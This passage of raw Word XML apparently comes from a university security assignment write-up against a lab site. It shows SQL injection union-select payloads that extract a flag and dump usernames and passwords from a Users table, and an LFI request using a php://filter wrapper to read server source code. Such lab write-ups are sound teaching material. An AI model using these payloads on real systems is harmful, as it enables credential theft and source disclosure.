          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>table_</w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">" and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>table_</w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>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 xml:space="preserve"> will provide us the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F908EA9" w14:textId="13A4E481" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005305D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37DEE375" wp14:editId="04218A0B">
            <wp:extent cx="4658008" cy="53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9249" cy="560457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD655D9" wp14:editId="7061E34A">
                <wp:extent cx="303530" cy="303530"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6" name="Rectangle 6" descr="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571F4" id="Rectangle 6" o:spid="_x0000_s1026" alt="2.4"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7EC2E27B" w14:textId="6C2CA139" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we can retrieve the string in Flag. Input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">'union select 1,string,3,4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Secure.Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>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 xml:space="preserve"> will give us the flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Turning_them_tables_with_a_squiggle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>!@#1teeHee}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A0B54" w14:textId="268B32E6" w:rsidR="008733D6" w:rsidRPr="008733D6" w:rsidRDefault="008733D6" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008733D6">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49FF8051" wp14:editId="3E6FA343">
            <wp:extent cx="5119926" cy="529628"/>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819" cy="607304"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA1A4B8" w14:textId="393251F0" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">'union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Id,Password,Username,Website</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>Secure.Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>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 xml:space="preserve"> provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF612B4" w14:textId="256C627E" w:rsidR="008733D6" w:rsidRDefault="008733D6" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008733D6">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C4033A2" wp14:editId="79017987">
            <wp:extent cx="3657600" cy="1100919"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3689315" cy="1110465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB18B4" w14:textId="355781EC" w:rsidR="00F01E92" w:rsidRPr="00047197" w:rsidRDefault="00F01E92" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791FFA6C" w14:textId="6E68AFED" w:rsidR="002932C0" w:rsidRDefault="002932C0" w:rsidP="008733D6">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002932C0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Section II – LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9936A" w14:textId="77777777" w:rsidR="007444DA" w:rsidRPr="007444DA" w:rsidRDefault="007444DA" w:rsidP="007444DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://assignment-dusty-rose.unimelb.life/style.php?css_file=custom.css</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is requested when the login page is visited, which indicates there may be LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36592FA3" w14:textId="6ECCBF6C" w:rsidR="007444DA" w:rsidRPr="007444DA" w:rsidRDefault="007444DA" w:rsidP="007444DA">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FD87597" wp14:editId="0763D0A9">
            <wp:extent cx="4917133" cy="156625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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5201797" cy="1656924"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18589590" wp14:editId="6DE86AEE">
                <wp:extent cx="303530" cy="303530"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="26" name="Rectangle 26"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43759" id="Rectangle 26" o:spid="_x0000_s1026" alt="1.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0107BD4B" w14:textId="4D6FA846" w:rsidR="005525C1" w:rsidRDefault="007444DA" w:rsidP="005525C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit </w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://assignment-dusty-rose.unimelb.life/style.php?css_file=php://filter/convert.base64-encode/resource=style.php</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and decode the response to get the content of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>style.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Though there is no flag in the file, we can know some of the </w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">website's defense mechanisms without authentication. </w:t>
      </w:r>
      <w:r w:rsidR="00F73763">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>style.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F73763">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is included in the code folder.</w:t>
      </w:r>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F976E41" w14:textId="7D0D382D" w:rsidR="005525C1" w:rsidRPr="005525C1" w:rsidRDefault="005525C1" w:rsidP="005525C1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005525C1">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3118F2" wp14:editId="1633E78F">
            <wp:extent cx="5228376" cy="3781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016" cy="381936"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6D597" w14:textId="330F850D" w:rsidR="007444DA" w:rsidRPr="007444DA" w:rsidRDefault="007444DA" w:rsidP="007444DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After authentication, we can have access to files such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007444DA">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="Times New Roman" w:hAnsi="var(--monospace)" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
